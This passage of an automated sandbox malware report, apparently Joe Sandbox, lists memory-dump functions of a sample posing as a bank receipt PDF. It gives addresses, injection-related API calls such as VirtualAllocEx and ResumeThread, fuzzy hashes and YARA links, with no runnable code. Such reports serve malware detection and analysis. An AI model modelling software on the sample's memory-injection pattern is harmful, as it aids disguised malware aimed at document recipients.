                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A0F14FE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                          • Opcode ID: 519314d624089f85138d3f7eeb641d2bbf3e78dc67dae24eceec3fa1c4ea15a1
                                                                                                                                                          • Instruction ID: 891e5ed2fc8bcb192297bf7345745c7219f5aab8ce3e7581704bfe33f6cbadb6
                                                                                                                                                          • Opcode Fuzzy Hash: 519314d624089f85138d3f7eeb641d2bbf3e78dc67dae24eceec3fa1c4ea15a1
                                                                                                                                                          • Instruction Fuzzy Hash: AC213672900249DFCB20DFA9C845AEEBFF5AF88320F248819E555A7260C7759544CFA4
                                                                                                                                                          Function 0A0F1490 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A0F14FE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                          • Opcode ID: 6ed3e7467f4ea7e596e28f781c61bb332d3b46dcb7f81ff5693b186b558ef868
                                                                                                                                                          • Instruction ID: d1b64642c7378353c128d6186524a1e37fb690f590f3ddc7d5b727b70403d154
                                                                                                                                                          • Opcode Fuzzy Hash: 6ed3e7467f4ea7e596e28f781c61bb332d3b46dcb7f81ff5693b186b558ef868
                                                                                                                                                          • Instruction Fuzzy Hash: C8112372900249DFCB10DFAAC844BDEBBF5EB88320F208819E559A7250C779A944CFA4
                                                                                                                                                          Function 0A0F0EC9 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                          • Opcode ID: e6e1bf09d724c6f723e3500d5f0ee544f4fd55fb57e1eb2869bb5a22951ccb8f
                                                                                                                                                          • Instruction ID: 97e26c0c1dd38f769edb830267a70fdb96fb1a49a9682df4ffbacba1dd7805ca
                                                                                                                                                          • Opcode Fuzzy Hash: e6e1bf09d724c6f723e3500d5f0ee544f4fd55fb57e1eb2869bb5a22951ccb8f
                                                                                                                                                          • Instruction Fuzzy Hash: 8E1158B1D003488FCB20DFAAC4457EEFBF4AB88320F20882AD459A7650C778A544CFA4
                                                                                                                                                          Function 0A0F0ED0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                          • Opcode ID: fed6608121b7ed4985c44f863b910eea2535ea32f963f0a321e8c20a06156baa
                                                                                                                                                          • Instruction ID: f6388bd9393dfdf4629843b1e3188516ad8a16ad1a2909367e9c29511ef7ee08
                                                                                                                                                          • Opcode Fuzzy Hash: fed6608121b7ed4985c44f863b910eea2535ea32f963f0a321e8c20a06156baa
                                                                                                                                                          • Instruction Fuzzy Hash: 77113AB1D003488FCB10DFAAC4457DEFBF4EB88324F208819D559A7650C779A544CFA4
                                                                                                                                                          Function 0A0F0904 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A0F5855
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                          • Opcode ID: e2920afe6fc84d1adb7a610c6cff22f2f01287ca249d96e6cc43d2c08cac2f94
                                                                                                                                                          • Instruction ID: c2b7a814d5835d0aeeb73b787e294d03c11ff1502c2fd220fccccb80a4b7e64b
                                                                                                                                                          • Opcode Fuzzy Hash: e2920afe6fc84d1adb7a610c6cff22f2f01287ca249d96e6cc43d2c08cac2f94
                                                                                                                                                          • Instruction Fuzzy Hash: 8011F2B5800349DFDB10DF9AD888BDEBBF8EB48324F108819E958B7610C375A944CFA5
                                                                                                                                                          Function 0A0F57F3 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A0F5855
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                          • Opcode ID: fb5695f237f3fbdd77fab75bcc2c4b8f23523451888d8d179734072ab3210e0e
                                                                                                                                                          • Instruction ID: 01cf8ce70a2fa01ab6cbedaf26458f2d877a4e9bf85f304c2cea3fd0f98ee2d3
                                                                                                                                                          • Opcode Fuzzy Hash: fb5695f237f3fbdd77fab75bcc2c4b8f23523451888d8d179734072ab3210e0e
                                                                                                                                                          • Instruction Fuzzy Hash: 3A11F2B58003489FCB10DF9AC884BDEBBF4EB48324F148459E958B7610C379A984CFA5
                                                                                                                                                          Function 0B84ADD1 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tekq
                                                                                                                                                          • API String ID: 0-2319236580
                                                                                                                                                          • Opcode ID: 1b32d1e67a9288359b7e9b9749e70999bdecd16a3bae12fb43ee4bf1b0c35855
                                                                                                                                                          • Instruction ID: a7f0eb2e8690ba04d5dfc91f15d854fe4c393b6e1a54a34b39bae4357072ba17
                                                                                                                                                          • Opcode Fuzzy Hash: 1b32d1e67a9288359b7e9b9749e70999bdecd16a3bae12fb43ee4bf1b0c35855
                                                                                                                                                          • Instruction Fuzzy Hash: C94118B4E4864CCFDB08CFA9C5446EEBBFABF89704F10902AD41AAB265DB345905CB50
                                                                                                                                                          Function 056FDFC8 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Hoq
                                                                                                                                                          • API String ID: 0-3049094369
                                                                                                                                                          • Opcode ID: 0661ef0ef8c8c1ee5dd1cab01a26aa8761d930980a52a445c029d87c132599e7
                                                                                                                                                          • Instruction ID: c2079dd947b1e7beff3c494640fc467a9abee8afa7fccdbc9bd7c2d748ef6bd0
                                                                                                                                                          • Opcode Fuzzy Hash: 0661ef0ef8c8c1ee5dd1cab01a26aa8761d930980a52a445c029d87c132599e7
                                                                                                                                                          • Instruction Fuzzy Hash: 7431B035E0020AEBDB059FA4D85899EBBBBFFC9310F14456AE502AB364DF319D44CB81
                                                                                                                                                          Function 0B841470 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: OijW
                                                                                                                                                          • API String ID: 0-3475513506
                                                                                                                                                          • Opcode ID: d4310407e208f09b252556341cfd31ef0fa19925e03eb6133cba3dc94053d048
                                                                                                                                                          • Instruction ID: e2b25ea117feceea0c35f83f62628715d6a0dd8ecb0c294a5c71a8975c10f33d
                                                                                                                                                          • Opcode Fuzzy Hash: d4310407e208f09b252556341cfd31ef0fa19925e03eb6133cba3dc94053d048
                                                                                                                                                          • Instruction Fuzzy Hash: 3931F8B4E0421ADFDB44DFA9C4819AEBBF2AF89300F119466D419E7324D3349A41CF51
                                                                                                                                                          Function 056FCC80 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 3
                                                                                                                                                          • API String ID: 0-1842515611
                                                                                                                                                          • Opcode ID: a2ec1e5ceea0ed893bf653ebe2ebfab1ed044a9b47bd6b4e993acab712cdaf6f
                                                                                                                                                          • Instruction ID: d542192f018b10971223d5ed750213138725f1723bb590409f2a974f5e721ace
                                                                                                                                                          • Opcode Fuzzy Hash: a2ec1e5ceea0ed893bf653ebe2ebfab1ed044a9b47bd6b4e993acab712cdaf6f
                                                                                                                                                          • Instruction Fuzzy Hash: 33215B317083895FCB165B7888546AF7FA5AF86354F08809AF259CF3D3C636C846C391
                                                                                                                                                          Function 0B847E99 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: u|P
                                                                                                                                                          • API String ID: 0-1764873574
                                                                                                                                                          • Opcode ID: d1557b934f8ba7e8706f3879b1ef95e489a5ee641824a0a68e042b5fa4c00cc8
                                                                                                                                                          • Instruction ID: 730e96a993b9d4d432bf9beb9c9ac645ead733d48f0550541500ced355afcfee
                                                                                                                                                          • Opcode Fuzzy Hash: d1557b934f8ba7e8706f3879b1ef95e489a5ee641824a0a68e042b5fa4c00cc8
                                                                                                                                                          • Instruction Fuzzy Hash: 3F112CB8E0520ADFCB04CFA9D54119EBBF2AB84310F2080AA9905E7324E7349F41CB55
                                                                                                                                                          Function 0B847EA8 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: u|P
                                                                                                                                                          • API String ID: 0-1764873574
                                                                                                                                                          • Opcode ID: fe0477a3e85cdcf66b64b386170afd42bb7868ee22de4c37bb9fc55a25d5cd08
                                                                                                                                                          • Instruction ID: a394fab65d20a3eb61e6483cb4d66ae2ede8da1865493fa51875c0f17625d2c6
                                                                                                                                                          • Opcode Fuzzy Hash: fe0477a3e85cdcf66b64b386170afd42bb7868ee22de4c37bb9fc55a25d5cd08
                                                                                                                                                          • Instruction Fuzzy Hash: 1011FBB8E0521EDFCB44CFA9C5415AEBBF2EB88310F2090AA9519E7354E7349F41CB55
                                                                                                                                                          Function 0B845E70 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: G'/.
                                                                                                                                                          • API String ID: 0-3562003039
                                                                                                                                                          • Opcode ID: ae49c609d53ebae3c89096d9d265b05f99e62a02ed57627b729c770ca9c85006
                                                                                                                                                          • Instruction ID: 73a7333bf9488a4119ffe3497847464d390117e403a90dd645714829e6616d4d
                                                                                                                                                          • Opcode Fuzzy Hash: ae49c609d53ebae3c89096d9d265b05f99e62a02ed57627b729c770ca9c85006
                                                                                                                                                          • Instruction Fuzzy Hash: D9018C70E19609DFCB08CFA4D94659DBFF2EB8A210F24D4B6C405E7264E7349B40DB51
                                                                                                                                                          Function 0B845E80 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: G'/.
                                                                                                                                                          • API String ID: 0-3562003039
                                                                                                                                                          • Opcode ID: 7d376f80b8376de85c21d19b2f7ced8ff4a7f8f5b9f06ebe2dfc7ea543a86042
                                                                                                                                                          • Instruction ID: 9a7411d86f0cdaa9c5f0fb7a2e3e4f51b0608e7065af3f2a48f9781f976c60b3
                                                                                                                                                          • Opcode Fuzzy Hash: 7d376f80b8376de85c21d19b2f7ced8ff4a7f8f5b9f06ebe2dfc7ea543a86042
                                                                                                                                                          • Instruction Fuzzy Hash: A20178B0E0520DDBCB08DFA5DA4599DFAB6EB99300F24E4A5951AE3264E7309B00DB11
                                                                                                                                                          Function 0B840E08 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 264a0defdfd0c5ddfe42f5ad3a12de45ef44418a04ec0568428fcf7fffa17b53
                                                                                                                                                          • Instruction ID: 6d1df962b3a38c867d3ce50e4c2f5be3a8991db829d290cd3e2a36b31aa16e25
                                                                                                                                                          • Opcode Fuzzy Hash: 264a0defdfd0c5ddfe42f5ad3a12de45ef44418a04ec0568428fcf7fffa17b53
                                                                                                                                                          • Instruction Fuzzy Hash: F0919574E0020A8FDB44DFA8D5809DDBBB6FF88310F209269D515AB369DB31AD46CF90
                                                                                                                                                          Function 056FD808 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fe12e146aab1a1fe6b4d2eced1050d69d3c509c7a3f325a2e4ed6686a46544c5
                                                                                                                                                          • Instruction ID: 8542d3e4b0a386820455d1614eb997055817764af1a38ce7a323784f27f64845
                                                                                                                                                          • Opcode Fuzzy Hash: fe12e146aab1a1fe6b4d2eced1050d69d3c509c7a3f325a2e4ed6686a46544c5
                                                                                                                                                          • Instruction Fuzzy Hash: 49717A70A002059FDB14DF69C484BAEBBF6FF89310F14846ED50AAB361DB74E841CB65
                                                                                                                                                          Function 056FB840 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6b2a799fa81f998b67b109b78525ea257188a335d1e2e782c27b2b5e441fb1b0
                                                                                                                                                          • Instruction ID: 322fc60b942620b648525b6a51e703ede221334167ecf0d696ddf1b0669d1450
                                                                                                                                                          • Opcode Fuzzy Hash: 6b2a799fa81f998b67b109b78525ea257188a335d1e2e782c27b2b5e441fb1b0
                                                                                                                                                          • Instruction Fuzzy Hash: 8A716C30E00609CFDB14DFB9D8586ADBBB2FF89310F149129E616A7361EF749945CB90
                                                                                                                                                          Function 056FD830 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7b211bc223c79805c6feafb310b38febdc08317cff86bc07225f069b9eea2c82
                                                                                                                                                          • Instruction ID: 3601ef5d10f269908f1604f5d38a4873eaa7016f00977bdc60fcf9495672a95b
                                                                                                                                                          • Opcode Fuzzy Hash: 7b211bc223c79805c6feafb310b38febdc08317cff86bc07225f069b9eea2c82
                                                                                                                                                          • Instruction Fuzzy Hash: 46516830B002009FDB15EB69C488BAEB7FABF89214F14456DD60ADB7A1DB71EC81CB55
                                                                                                                                                          Function 056FD724 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 90d6e2e5919727ac3bb277d60031b043cefe95efa0775f9e3499812c1b66f749
                                                                                                                                                          • Instruction ID: 50fd7393220cc6dbc026b79c704285b5ea551b67f4451f131fb92c25e77e1c2a
                                                                                                                                                          • Opcode Fuzzy Hash: 90d6e2e5919727ac3bb277d60031b043cefe95efa0775f9e3499812c1b66f749
                                                                                                                                                          • Instruction Fuzzy Hash: 35319C30E12208DFCB14DFA4E5985ADFFB2FF85301F218569E152A72A5CB31A865CB44
                                                                                                                                                          Function 056FBB90 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1d64a830fdf9ef95b1604f5153affcb24103f8a62f1c67f4a4cc095dd98c7aa8
                                                                                                                                                          • Instruction ID: 917032705b67477c2404a9a1b32017ce9a7fc924330d981b83910cc01cb033b2
                                                                                                                                                          • Opcode Fuzzy Hash: 1d64a830fdf9ef95b1604f5153affcb24103f8a62f1c67f4a4cc095dd98c7aa8
                                                                                                                                                          • Instruction Fuzzy Hash: 07418070A04209DFCB48EBB9C554A6EBBF6FF84300F648469D509E73A9CE349D42CB51
                                                                                                                                                          Function 056FDB68 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 635b68c3386244d94e326a79a5f0971d70bbce50629154e0000ed087a3671dca
                                                                                                                                                          • Instruction ID: 7bfb6d401fa45b0192d0306ac905c074f561118c4bacd32c37e79de1d442f332
                                                                                                                                                          • Opcode Fuzzy Hash: 635b68c3386244d94e326a79a5f0971d70bbce50629154e0000ed087a3671dca
                                                                                                                                                          • Instruction Fuzzy Hash: AD419270E00205CFDB24EF78C0986ADBBB6EF88214F14492DD601BB354DB756D81CBA5
                                                                                                                                                          Function 056FB308 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8776fdcc62c215b9f54b96626b126df9cfa5c96b77859daa9336c6efc31bb962
                                                                                                                                                          • Instruction ID: 61385a89449887421bee1f8af0523bd6039656514b0807b6bfd787409bc85802
                                                                                                                                                          • Opcode Fuzzy Hash: 8776fdcc62c215b9f54b96626b126df9cfa5c96b77859daa9336c6efc31bb962
                                                                                                                                                          • Instruction Fuzzy Hash: 37410735B042288FDB44EFA8C894BDDB7B2FF48314F100069EA05AB3B1DB749841CBA5
                                                                                                                                                          Function 0B84B5D0 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d7fd2585c69fe08cbbd67c5a09a2691e481d24649cbc2550fdbe1371de0afcf5
                                                                                                                                                          • Instruction ID: 16fbe612a39bcad20e8f6d7ce62f5bd189a948a0928f5b5c264afe7f8b703685
                                                                                                                                                          • Opcode Fuzzy Hash: d7fd2585c69fe08cbbd67c5a09a2691e481d24649cbc2550fdbe1371de0afcf5
                                                                                                                                                          • Instruction Fuzzy Hash: 1F411874D0920DCFCB08CF9AD4546BEBBF6AB8D300F149069D419E7261D7348A41CF55
                                                                                                                                                          Function 0B845284 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c025dfe4f8581df244409bb7036e0129246767ab9cafa18a4961ce79a91ff16d
                                                                                                                                                          • Instruction ID: 6171cc5882ac0f2d222955a65af5387b95f937ee4e8d99cc17ecf516b51ef0aa
                                                                                                                                                          • Opcode Fuzzy Hash: c025dfe4f8581df244409bb7036e0129246767ab9cafa18a4961ce79a91ff16d
                                                                                                                                                          • Instruction Fuzzy Hash: E0315775A00249EFCB14DFA9D845A9EBFF5FB48324F10846AE519E7220D775E940CFA0
                                                                                                                                                          Function 056FDB58 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4526a64e5dab35e9eee749d45c528ad66804890ec4d573eaed7a696d617ecd0a
                                                                                                                                                          • Instruction ID: 4712f73b3f4c157d81962081c367989836547a4d06f6b36601e37f7dde9f566b
                                                                                                                                                          • Opcode Fuzzy Hash: 4526a64e5dab35e9eee749d45c528ad66804890ec4d573eaed7a696d617ecd0a
                                                                                                                                                          • Instruction Fuzzy Hash: 8831C070E00205CFDB24EF78C5586ADBAB6FF89318F144839C601AB394DA79A981CB95
                                                                                                                                                          Function 056FD680 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
